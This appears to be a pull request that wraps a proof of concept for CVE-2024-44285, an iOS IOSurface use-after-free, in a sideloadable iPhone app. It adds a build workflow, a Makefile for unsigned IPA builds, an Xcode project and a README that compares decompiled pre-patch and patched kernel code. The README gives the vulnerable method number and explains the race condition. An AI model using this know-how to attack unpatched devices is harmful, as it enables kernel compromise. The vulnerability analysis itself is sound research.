### PR TITLE
iPhone Application for testing the PoC + Workflow Building Script

### DIFF
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -1,0 +1,31 @@
+name: Build the Application
+
+on:
+  workflow_dispatch:
+
+jobs:
+  build:
+    name: Build
+    runs-on: macos-latest
+
+    steps:
+      # Step 1: Checkout repository
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      # Step 2: Install make (if necessary)
+      - name: Install make (if needed)
+        run: |
+          brew install make
+
+      # Step 3: Run the Makefile
+      - name: Run makefile to build the app
+        run: |
+          make
+          
+      # Step 4: Upload artifact
+      - name: Upload artifact
+        uses: actions/upload-artifact@v3
+        with:
+          name: explt-ipa
+          path: build/explt.ipa

--- a/Makefile
+++ b/Makefile
@@ -1,0 +1,71 @@
+PROJECT_FILE         := $(shell find . -name "*.xcodeproj" | head -n 1)
+ARCHIVE_PATH         := build/explt.xcarchive
+DERIVED_DATA_PATH    := build/DerivedData
+IPA_PATH             := build/explt.ipa
+EXPORT_OPTIONS_PLIST := $(shell pwd)/entitlements.plist
+
+# Define the target for the full build process
+all: build_ipa
+
+# Step 1: List available Xcode versions and switch to Xcode 16.1
+setup_xcode:
+	@echo "Available Xcode versions:"
+	@ls /Applications | grep Xcode
+	@echo "Targeting Xcode 16.1..."
+	@if [ ! -d "/Applications/Xcode_16.1.app" ]; then \
+		echo "Error: Xcode 16.1 is not installed on the runner."; \
+		exit 1; \
+	fi
+	@echo "Switching to Xcode 16.1..."
+	@sudo xcode-select --switch /Applications/Xcode_16.1.app/Contents/Developer
+	@xcodebuild -version
+
+# Step 2: Clean the project
+clean:
+	@if [ -z "$(PROJECT_FILE)" ]; then \
+		echo "Error: No .xcodeproj file found."; \
+		exit 1; \
+	fi
+	@echo "Cleaning project..."
+	@xcodebuild -project "$(PROJECT_FILE)" \
+				-scheme explt \
+				-configuration Release \
+				-sdk iphoneos \
+				-derivedDataPath "$(DERIVED_DATA_PATH)" \
+				clean
+
+# Step 3: Build the app (unsigned) and archive
+archive:
+	@if [ -z "$(PROJECT_FILE)" ]; then \
+		echo "Error: No .xcodeproj file found."; \
+		exit 1; \
+	fi
+	@echo "Building and archiving the app..."
+	@xcodebuild -project "$(PROJECT_FILE)" \
+				-scheme explt \
+				-configuration Release \
+				-sdk iphoneos \
+				-derivedDataPath "$(DERIVED_DATA_PATH)" \
+				-archivePath "$(ARCHIVE_PATH)" \
+				CODE_SIGN_IDENTITY="" \
+				CODE_SIGNING_REQUIRED=NO \
+				CODE_SIGN_ENTITLEMENTS="" \
+				CODE_SIGNING_ALLOWED=NO \
+				archive
+
+# Step 4: Manually create the IPA file
+export_ipa:
+	@echo "Creating the IPA file manually..."
+	@mkdir -p build/temp
+	@cp -R "$(ARCHIVE_PATH)/Products/Applications/explt.app" build/temp/
+	@cd build/temp && zip -r ../explt.ipa explt.app
+	@rm -rf build/temp
+
+# Step 5: Complete build process (combine all steps)
+build_ipa: setup_xcode clean archive export_ipa
+	@echo "IPA build complete and available at $(IPA_PATH)"
+
+# Target to clean the build directory
+clean_all:
+	@echo "Cleaning all build files..."
+	@rm -rf build

--- a/README.md
+++ b/README.md
@@ -1,14 +1,72 @@
-# CVE-2024-44285: IOSurface UaF
-
+# IOSurface UaF (CVE-2024-44285 PoC)
+## Introduction
 This bug was introduced in iOS 18 and it is relatively shallow as it occurs in the second function after the base `s_method` call.  
 The vulnerable function lies in `s_set_corevideo_bridged_keys`, which is method #54 on iOS and #57 on macOS.  
 
-A pre-patch version of the vulnerable function can be seen below:
+A lock was missing from the pre-patch version. Calling this method from multiple threads it is possible to over-release an OSArray. 
+Funnily enough, it seems that that while in the KEXT the locking mechanism was missed, in the userland library this method is correctly called via locks
 
-![Pre-Patch Function](images/function.png)
+### A pre-patch version of the vulnerable function can be seen below:
+```c
+int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurfaceRootUserClient* this, uint64_t* structureInput, unsigned int structureInputSize) {
+    int64_t v4;            // x21
+    OSObject* v5;              // x0
+    const OSObject* v6;        // x0
+    OSArray* oarray;           // x0
+    OSArray* user_oarray;      // x0
+    OSArray* arr_from_user_in; // x0
 
-Diffing the two versions shows the patch very clearly:
+    v4 = 0xE00002C2LL;
+    v5 = OSUnserializeXML((const char*)structureInput + 12, structureInputSize - 12LL, 0LL);
+    if (v5) {
+        v6 = v5;
+        oarray = (OSArray*)OSMetaClassBase::safeMetaCast(v5, (const OSMetaClass*)&OSArray::gMetaClass);
+        if (oarray) {
+            user_oarray = OSArray::withArray(oarray, 0);
+            arr_from_user_in = this->corevideo_bridged_keys;
+            if (arr_from_user_in)
+                arr_from_user_in->release(arr_from_user_in);
+            v4 = 0LL;
+            this->corevideo_bridged_keys = user_oarray;
+        }
+        v6->release(v6);
+    }
+    return v4;
+}
+```
 
-![Diffing the two functions](images/diff.png)
+### Diffing the two versions shows the patch very clearly:
+First Version (Second one coming)
+```c
+int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurfaceRootUserClient * this, uint64_t * structureInput, unsigned int structureInputSize) {
+    int64_t v4;            // x21
+    OSObject* v5;              // x0
+    const OSObject* v6;        // x0
+    OSMetaClassBase* oarray;   // x0
+    const OSArray* osarray_parsed; // x22
+    OSArray* user_oarray;      // x0
+    OSArray* arr_from_user_in; // x0
 
-A lock was missing from the pre-patch version. Calling this method from multiple threads it is possible to over-release an OSArray. (Funnily enough, it seems that that while in the KEXT the locking mechanism was missed, in the userland library this method is correctly called via locks)
+    v4 = 0xE00002C2LL;
+    v5 = OSUnserializeXML((const char*)structureInput + 12, structureInputSize - 12LL, 0LL);
+    if (v5) {
+        v6 = v5;
+        oarray = (OSArray*)OSMetaClassBase::safeMetaCast(v5, (const OSMetaClass*)&OSArray::gMetaClass);
+        if (oarray) {
+            osarray_parsed = (const OSArray*)oarray;
+            lck_rw_lock_exclusive(*(IORWLock**)&this->surface_lck_mtx);
+            user_oarray = OSArray::withArray(osarray_parsed, 0);
+            arr_from_user_in = this->corevideo_bridged_keys;
+            if (arr_from_user_in)
+                arr_from_user_in->release(arr_from_user_in);
+
+            this->corevideo_bridged_keys = user_oarray;
+
+            lck_rw_done(*(IORWLock**)&this->surface_lck_mtx);
+            v4 = 0LL;
+        }
+        v6->release(v6);
+    }
+    return v4;
+}
+```

--- a/README.md
+++ b/README.md
@@ -1,20 +1,30 @@
-# IOSurface UaF (CVE-2024-44285 PoC)
+# (CVE-2024-44285) IOSurface Use-After-Free PoC
+> Thanks to [slds1](https://github.com/slds1/explt) this Proof of Concept can now be sideloaded onto your device for testing...<br>
+> **TODO: Implement Textarea element, to show printf-logs**
+
 ## Introduction
-This bug was introduced in iOS 18 and it is relatively shallow as it occurs in the second function after the base `s_method` call.  
-The vulnerable function lies in `s_set_corevideo_bridged_keys`, which is method #54 on iOS and #57 on macOS.  
+This PoC demonstrates a use-after-free (UaF) vulnerability in the `IOSurface` framework, identified as **CVE-2024-44285**. The bug was introduced in **iOS 18** and is relatively shallow, occurring in the second function after the base `s_method` call. The vulnerable function resides in `s_set_corevideo_bridged_keys`, which is method #54 on iOS and #57 on macOS.
 
-A lock was missing from the pre-patch version. Calling this method from multiple threads it is possible to over-release an OSArray. 
-Funnily enough, it seems that that while in the KEXT the locking mechanism was missed, in the userland library this method is correctly called via locks
+The root cause of the issue is a missing lock in the pre-patch version of the function. This allows multiple threads to call the method concurrently, potentially causing an over-release of an `OSArray`. Interestingly, while the kernel extension (KEXT) lacks the locking mechanism, the equivalent userland library correctly applies locks when invoking this method.
 
-### A pre-patch version of the vulnerable function can be seen below:
+---
+
+## Vulnerability Details
+
+The issue arises in the `IOSurfaceRootUserClient::set_corevideo_bridged_keys` function. A pre-patch version of this function is shown below, highlighting the missing locking mechanism.
+
+### Pre-Patch Vulnerable Function
+<details>
+<summary>See Code Example</summary>
+
 ```c
 int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurfaceRootUserClient* this, uint64_t* structureInput, unsigned int structureInputSize) {
-    int64_t v4;            // x21
-    OSObject* v5;              // x0
-    const OSObject* v6;        // x0
-    OSArray* oarray;           // x0
-    OSArray* user_oarray;      // x0
-    OSArray* arr_from_user_in; // x0
+    int64_t v4;                  // x21
+    OSObject* v5;               // x0
+    const OSObject* v6;         // x0
+    OSArray* oarray;            // x0
+    OSArray* user_oarray;       // x0
+    OSArray* arr_from_user_in;  // x0
 
     v4 = 0xE00002C2LL;
     v5 = OSUnserializeXML((const char*)structureInput + 12, structureInputSize - 12LL, 0LL);
@@ -34,18 +44,26 @@ int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurface
     return v4;
 }
 ```
+</details>
 
-### Diffing the two versions shows the patch very clearly:
-First Version (Second one coming)
+---
+
+### Patch Analysis
+
+The patched version of the function introduces proper locking to prevent race conditions. A comparison of the two versions highlights this critical addition.
+
+<details>
+<summary>Patched Version</summary>
+
 ```c
 int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurfaceRootUserClient * this, uint64_t * structureInput, unsigned int structureInputSize) {
-    int64_t v4;            // x21
-    OSObject* v5;              // x0
-    const OSObject* v6;        // x0
-    OSMetaClassBase* oarray;   // x0
+    int64_t v4;                     // x21
+    OSObject* v5;                  // x0
+    const OSObject* v6;            // x0
+    OSMetaClassBase* oarray;       // x0
     const OSArray* osarray_parsed; // x22
-    OSArray* user_oarray;      // x0
-    OSArray* arr_from_user_in; // x0
+    OSArray* user_oarray;          // x0
+    OSArray* arr_from_user_in;     // x0
 
     v4 = 0xE00002C2LL;
     v5 = OSUnserializeXML((const char*)structureInput + 12, structureInputSize - 12LL, 0LL);
@@ -54,7 +72,7 @@ int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurface
         oarray = (OSArray*)OSMetaClassBase::safeMetaCast(v5, (const OSMetaClass*)&OSArray::gMetaClass);
         if (oarray) {
             osarray_parsed = (const OSArray*)oarray;
-            lck_rw_lock_exclusive(*(IORWLock**)&this->surface_lck_mtx);
+            lck_rw_lock_exclusive(*(IORWLock**)&this->surface_lck_mtx); // Added Lock
             user_oarray = OSArray::withArray(osarray_parsed, 0);
             arr_from_user_in = this->corevideo_bridged_keys;
             if (arr_from_user_in)
@@ -62,7 +80,7 @@ int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurface
 
             this->corevideo_bridged_keys = user_oarray;
 
-            lck_rw_done(*(IORWLock**)&this->surface_lck_mtx);
+            lck_rw_done(*(IORWLock**)&this->surface_lck_mtx); // Unlock
             v4 = 0LL;
         }
         v6->release(v6);
@@ -70,3 +88,22 @@ int64_t __fastcall IOSurfaceRootUserClient::set_corevideo_bridged_keys(IOSurface
     return v4;
 }
 ```
+</details>
+
+The addition of `lck_rw_lock_exclusive` and `lck_rw_done` ensures exclusive access to the shared resource, mitigating the race condition and preventing the use-after-free scenario.
+
+---
+
+## CVE Information
+
+- **CVE Identifier**: [CVE-2024-44285](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44285)
+- **Affected Platforms**: iOS 18, macOS (specific versions)
+- **Impact**: Exploiting this vulnerability could allow attackers to achieve a kernel panic or potentially execute arbitrary code with kernel privileges.
+- **Severity**: High
+
+---
+
+## Credits
+
+- [tomitokics](https://github.com/tomitokics/IOSurface_poc18): For creating the initial PoC for CVE-2024-44285.
+- [slds1](https://github.com/slds1/explt): For providing the iPhone app Xcode project used in this repository.

--- a/explt.xcodeproj/project.pbxproj
+++ b/explt.xcodeproj/project.pbxproj
@@ -1,0 +1,361 @@
+// !$*UTF8*$!
+{
+	archiveVersion = 1;
+	classes = {
+	};
+	objectVersion = 56;
+	objects = {
+
+/* Begin PBXBuildFile section */
+		5D7795D52CFB463600EA74F6 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 5D7795D42CFB463600EA74F6 /* IOKit.framework */; };
+		5D7795D72CFB463A00EA74F6 /* IOSurface.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 5D7795D62CFB463A00EA74F6 /* IOSurface.framework */; };
+/* End PBXBuildFile section */
+
+/* Begin PBXFileReference section */
+		5D7795B42CFB45E800EA74F6 /* explt.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = explt.app; sourceTree = BUILT_PRODUCTS_DIR; };
+		5D7795D42CFB463600EA74F6 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; };
+		5D7795D62CFB463A00EA74F6 /* IOSurface.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOSurface.framework; path = System/Library/Frameworks/IOSurface.framework; sourceTree = SDKROOT; };
+/* End PBXFileReference section */
+
+/* Begin PBXFileSystemSynchronizedBuildFileExceptionSet section */
+		5D7795CB2CFB45EA00EA74F6 /* Exceptions for "explt" folder in "explt" target */ = {
+			isa = PBXFileSystemSynchronizedBuildFileExceptionSet;
+			membershipExceptions = (
+				Info.plist,
+			);
+			target = 5D7795B32CFB45E800EA74F6 /* explt */;
+		};
+/* End PBXFileSystemSynchronizedBuildFileExceptionSet section */
+
+/* Begin PBXFileSystemSynchronizedRootGroup section */
+		5D7795B62CFB45E800EA74F6 /* explt */ = {
+			isa = PBXFileSystemSynchronizedRootGroup;
+			exceptions = (
+				5D7795CB2CFB45EA00EA74F6 /* Exceptions for "explt" folder in "explt" target */,
+			);
+			path = explt;
+			sourceTree = "<group>";
+		};
+/* End PBXFileSystemSynchronizedRootGroup section */
+
+/* Begin PBXFrameworksBuildPhase section */
+		5D7795B12CFB45E800EA74F6 /* Frameworks */ = {
+			isa = PBXFrameworksBuildPhase;
+			buildActionMask = 2147483647;
+			files = (
+				5D7795D72CFB463A00EA74F6 /* IOSurface.framework in Frameworks */,
+				5D7795D52CFB463600EA74F6 /* IOKit.framework in Frameworks */,
+			);
+			runOnlyForDeploymentPostprocessing = 0;
+		};
+/* End PBXFrameworksBuildPhase section */
+
+/* Begin PBXGroup section */
+		5D7795AB2CFB45E800EA74F6 = {
+			isa = PBXGroup;
+			children = (
+				5D7795B62CFB45E800EA74F6 /* explt */,
+				5D7795D32CFB463600EA74F6 /* Frameworks */,
+				5D7795B52CFB45E800EA74F6 /* Products */,
+			);
+			sourceTree = "<group>";
+		};
+		5D7795B52CFB45E800EA74F6 /* Products */ = {
+			isa = PBXGroup;
+			children = (
+				5D7795B42CFB45E800EA74F6 /* explt.app */,
+			);
+			name = Products;
+			sourceTree = "<group>";
+		};
+		5D7795D32CFB463600EA74F6 /* Frameworks */ = {
+			isa = PBXGroup;
+			children = (
+				5D7795D62CFB463A00EA74F6 /* IOSurface.framework */,
+				5D7795D42CFB463600EA74F6 /* IOKit.framework */,
+			);
+			name = Frameworks;
+			sourceTree = "<group>";
+		};
+/* End PBXGroup section */
+
+/* Begin PBXNativeTarget section */
+		5D7795B32CFB45E800EA74F6 /* explt */ = {
+			isa = PBXNativeTarget;
+			buildConfigurationList = 5D7795CC2CFB45EA00EA74F6 /* Build configuration list for PBXNativeTarget "explt" */;
+			buildPhases = (
+				5D7795B02CFB45E800EA74F6 /* Sources */,
+				5D7795B12CFB45E800EA74F6 /* Frameworks */,
+				5D7795B22CFB45E800EA74F6 /* Resources */,
+			);
+			buildRules = (
+			);
+			dependencies = (
+			);
+			fileSystemSynchronizedGroups = (
+				5D7795B62CFB45E800EA74F6 /* explt */,
+			);
+			name = explt;
+			packageProductDependencies = (
+			);
+			productName = explt;
+			productReference = 5D7795B42CFB45E800EA74F6 /* explt.app */;
+			productType = "com.apple.product-type.application";
+		};
+/* End PBXNativeTarget section */
+
+/* Begin PBXProject section */
+		5D7795AC2CFB45E800EA74F6 /* Project object */ = {
+			isa = PBXProject;
+			attributes = {
+				BuildIndependentTargetsInParallel = 1;
+				LastUpgradeCheck = 1610;
+				TargetAttributes = {
+					5D7795B32CFB45E800EA74F6 = {
+						CreatedOnToolsVersion = 16.1;
+					};
+				};
+			};
+			buildConfigurationList = 5D7795AF2CFB45E800EA74F6 /* Build configuration list for PBXProject "explt" */;
+			developmentRegion = en;
+			hasScannedForEncodings = 0;
+			knownRegions = (
+				en,
+				Base,
+			);
+			mainGroup = 5D7795AB2CFB45E800EA74F6;
+			minimizedProjectReferenceProxies = 1;
+			preferredProjectObjectVersion = 56;
+			productRefGroup = 5D7795B52CFB45E800EA74F6 /* Products */;
+			projectDirPath = "";
+			projectRoot = "";
+			targets = (
+				5D7795B32CFB45E800EA74F6 /* explt */,
+			);
+		};
+/* End PBXProject section */
+
+/* Begin PBXResourcesBuildPhase section */
+		5D7795B22CFB45E800EA74F6 /* Resources */ = {
+			isa = PBXResourcesBuildPhase;
+			buildActionMask = 2147483647;
+			files = (
+			);
+			runOnlyForDeploymentPostprocessing = 0;
+		};
+/* End PBXResourcesBuildPhase section */
+
+/* Begin PBXSourcesBuildPhase section */
+		5D7795B02CFB45E800EA74F6 /* Sources */ = {
+			isa = PBXSourcesBuildPhase;
+			buildActionMask = 2147483647;
+			files = (
+			);
+			runOnlyForDeploymentPostprocessing = 0;
+		};
+/* End PBXSourcesBuildPhase section */
+
+/* Begin XCBuildConfiguration section */
+		5D7795CD2CFB45EA00EA74F6 /* Debug */ = {
+			isa = XCBuildConfiguration;
+			buildSettings = {
+				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
+				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
+				CODE_SIGN_STYLE = Manual;
+				CODE_SIGN_IDENTITY = "";
+				CODE_SIGN_REQUIRED = NO;
+				CODE_SIGN_ALLOWED = NO;
+				PROVISIONING_PROFILE = "";
+				CURRENT_PROJECT_VERSION = 1;
+				DEVELOPMENT_TEAM = "";
+				GENERATE_INFOPLIST_FILE = YES;
+				INFOPLIST_FILE = explt/Info.plist;
+				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
+				INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen;
+				INFOPLIST_KEY_UIMainStoryboardFile = Main;
+				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
+				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
+				LD_RUNPATH_SEARCH_PATHS = (
+					"$(inherited)",
+					"@executable_path/Frameworks",
+				);
+				MARKETING_VERSION = 1.0;
+				PRODUCT_BUNDLE_IDENTIFIER = com.s0meyosh1no.explt;
+				PRODUCT_NAME = "$(TARGET_NAME)";
+				SWIFT_EMIT_LOC_STRINGS = YES;
+				TARGETED_DEVICE_FAMILY = "1,2";
+			};
+			name = Debug;
+		};
+		5D7795CE2CFB45EA00EA74F6 /* Release */ = {
+			isa = XCBuildConfiguration;
+			buildSettings = {
+				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
+				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
+				CODE_SIGN_STYLE = Manual;
+				ODE_SIGN_IDENTITY = "";
+				CODE_SIGN_REQUIRED = NO;
+				CODE_SIGN_ALLOWED = NO;
+				PROVISIONING_PROFILE = "";
+				CURRENT_PROJECT_VERSION = 1;
+				DEVELOPMENT_TEAM = "";
+				GENERATE_INFOPLIST_FILE = YES;
+				INFOPLIST_FILE = explt/Info.plist;
+				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
+				INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen;
+				INFOPLIST_KEY_UIMainStoryboardFile = Main;
+				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
+				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
+				LD_RUNPATH_SEARCH_PATHS = (
+					"$(inherited)",
+					"@executable_path/Frameworks",
+				);
+				MARKETING_VERSION = 1.0;
+				PRODUCT_BUNDLE_IDENTIFIER = com.s0meyosh1no.explt;
+				PRODUCT_NAME = "$(TARGET_NAME)";
+				SWIFT_EMIT_LOC_STRINGS = YES;
+				TARGETED_DEVICE_FAMILY = "1,2";
+			};
+			name = Release;
+		};
+		5D7795CF2CFB45EA00EA74F6 /* Debug */ = {
+			isa = XCBuildConfiguration;
+			buildSettings = {
+				ALWAYS_SEARCH_USER_PATHS = NO;
+				ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES;
+				CLANG_ANALYZER_NONNULL = YES;
+				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
+				CLANG_CXX_LANGUAGE_STANDARD = "gnu++20";
+				CLANG_ENABLE_MODULES = YES;
+				CLANG_ENABLE_OBJC_ARC = YES;
+				CLANG_ENABLE_OBJC_WEAK = YES;
+				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
+				CLANG_WARN_BOOL_CONVERSION = YES;
+				CLANG_WARN_COMMA = YES;
+				CLANG_WARN_CONSTANT_CONVERSION = YES;
+				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
+				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
+				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
+				CLANG_WARN_EMPTY_BODY = YES;
+				CLANG_WARN_ENUM_CONVERSION = YES;
+				CLANG_WARN_INFINITE_RECURSION = YES;
+				CLANG_WARN_INT_CONVERSION = YES;
+				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
+				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
+				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
+				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
+				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
+				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
+				CLANG_WARN_STRICT_PROTOTYPES = YES;
+				CLANG_WARN_SUSPICIOUS_MOVE = YES;
+				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
+				CLANG_WARN_UNREACHABLE_CODE = YES;
+				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
+				COPY_PHASE_STRIP = NO;
+				DEBUG_INFORMATION_FORMAT = dwarf;
+				ENABLE_STRICT_OBJC_MSGSEND = YES;
+				ENABLE_TESTABILITY = YES;
+				ENABLE_USER_SCRIPT_SANDBOXING = YES;
+				GCC_C_LANGUAGE_STANDARD = gnu17;
+				GCC_DYNAMIC_NO_PIC = NO;
+				GCC_NO_COMMON_BLOCKS = YES;
+				GCC_OPTIMIZATION_LEVEL = 0;
+				GCC_PREPROCESSOR_DEFINITIONS = (
+					"DEBUG=1",
+					"$(inherited)",
+				);
+				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
+				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
+				GCC_WARN_UNDECLARED_SELECTOR = YES;
+				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
+				GCC_WARN_UNUSED_FUNCTION = YES;
+				GCC_WARN_UNUSED_VARIABLE = YES;
+				IPHONEOS_DEPLOYMENT_TARGET = 18.1;
+				LOCALIZATION_PREFERS_STRING_CATALOGS = YES;
+				MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
+				MTL_FAST_MATH = YES;
+				ONLY_ACTIVE_ARCH = YES;
+				SDKROOT = iphoneos;
+			};
+			name = Debug;
+		};
+		5D7795D02CFB45EA00EA74F6 /* Release */ = {
+			isa = XCBuildConfiguration;
+			buildSettings = {
+				ALWAYS_SEARCH_USER_PATHS = NO;
+				ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES;
+				CLANG_ANALYZER_NONNULL = YES;
+				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
+				CLANG_CXX_LANGUAGE_STANDARD = "gnu++20";
+				CLANG_ENABLE_MODULES = YES;
+				CLANG_ENABLE_OBJC_ARC = YES;
+				CLANG_ENABLE_OBJC_WEAK = YES;
+				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
+				CLANG_WARN_BOOL_CONVERSION = YES;
+				CLANG_WARN_COMMA = YES;
+				CLANG_WARN_CONSTANT_CONVERSION = YES;
+				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
+				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
+				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
+				CLANG_WARN_EMPTY_BODY = YES;
+				CLANG_WARN_ENUM_CONVERSION = YES;
+				CLANG_WARN_INFINITE_RECURSION = YES;
+				CLANG_WARN_INT_CONVERSION = YES;
+				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
+				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
+				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
+				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
+				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
+				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
+				CLANG_WARN_STRICT_PROTOTYPES = YES;
+				CLANG_WARN_SUSPICIOUS_MOVE = YES;
+				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
+				CLANG_WARN_UNREACHABLE_CODE = YES;
+				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
+				COPY_PHASE_STRIP = NO;
+				DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
+				ENABLE_NS_ASSERTIONS = NO;
+				ENABLE_STRICT_OBJC_MSGSEND = YES;
+				ENABLE_USER_SCRIPT_SANDBOXING = YES;
+				GCC_C_LANGUAGE_STANDARD = gnu17;
+				GCC_NO_COMMON_BLOCKS = YES;
+				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
+				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
+				GCC_WARN_UNDECLARED_SELECTOR = YES;
+				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
+				GCC_WARN_UNUSED_FUNCTION = YES;
+				GCC_WARN_UNUSED_VARIABLE = YES;
+				IPHONEOS_DEPLOYMENT_TARGET = 18.1;
+				LOCALIZATION_PREFERS_STRING_CATALOGS = YES;
+				MTL_ENABLE_DEBUG_INFO = NO;
+				MTL_FAST_MATH = YES;
+				SDKROOT = iphoneos;
+				VALIDATE_PRODUCT = NO;
+			};
+			name = Release;
+		};
+/* End XCBuildConfiguration section */
+
+/* Begin XCConfigurationList section */
+		5D7795AF2CFB45E800EA74F6 /* Build configuration list for PBXProject "explt" */ = {
+			isa = XCConfigurationList;
+			buildConfigurations = (
+				5D7795CF2CFB45EA00EA74F6 /* Debug */,
+				5D7795D02CFB45EA00EA74F6 /* Release */,
+			);
+			defaultConfigurationIsVisible = 0;
+			defaultConfigurationName = Release;
+		};
+		5D7795CC2CFB45EA00EA74F6 /* Build configuration list for PBXNativeTarget "explt" */ = {
+			isa = XCConfigurationList;
+			buildConfigurations = (
+				5D7795CD2CFB45EA00EA74F6 /* Debug */,
+				5D7795CE2CFB45EA00EA74F6 /* Release */,
+			);
+			defaultConfigurationIsVisible = 0;
+			defaultConfigurationName = Release;
+		};
+/* End XCConfigurationList section */
+	};
+	rootObject = 5D7795AC2CFB45E800EA74F6 /* Project object */;
+}

--- a/explt.xcodeproj/project.xcworkspace/contents.xcworkspacedata
+++ b/explt.xcodeproj/project.xcworkspace/contents.xcworkspacedata
@@ -1,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Workspace
+   version = "1.0">
+   <FileRef
+      location = "self:">
+   </FileRef>
+</Workspace>

--- a/explt.xcodeproj/xcuserdata/salupovtech.xcuserdatad/xcschemes/xcschememanagement.plist
+++ b/explt.xcodeproj/xcuserdata/salupovtech.xcuserdatad/xcschemes/xcschememanagement.plist
@@ -1,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>SchemeUserState</key>
+	<dict>
+		<key>explt.xcscheme_^#shared#^_</key>
+		<dict>
+			<key>orderHint</key>
+			<integer>0</integer>
+		</dict>
+	</dict>
+</dict>
+</plist>

--- a/explt/AppDelegate.h
+++ b/explt/AppDelegate.h
@@ -1,0 +1,14 @@
+//
+//  AppDelegate.h
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import <UIKit/UIKit.h>
+
+@interface AppDelegate : UIResponder <UIApplicationDelegate>
+
+
+@end
+

--- a/explt/AppDelegate.m
+++ b/explt/AppDelegate.m
@@ -1,0 +1,40 @@
+//
+//  AppDelegate.m
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import "AppDelegate.h"
+
+@interface AppDelegate ()
+
+@end
+
+@implementation AppDelegate
+
+
+- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
+    // Override point for customization after application launch.
+    return YES;
+}
+
+
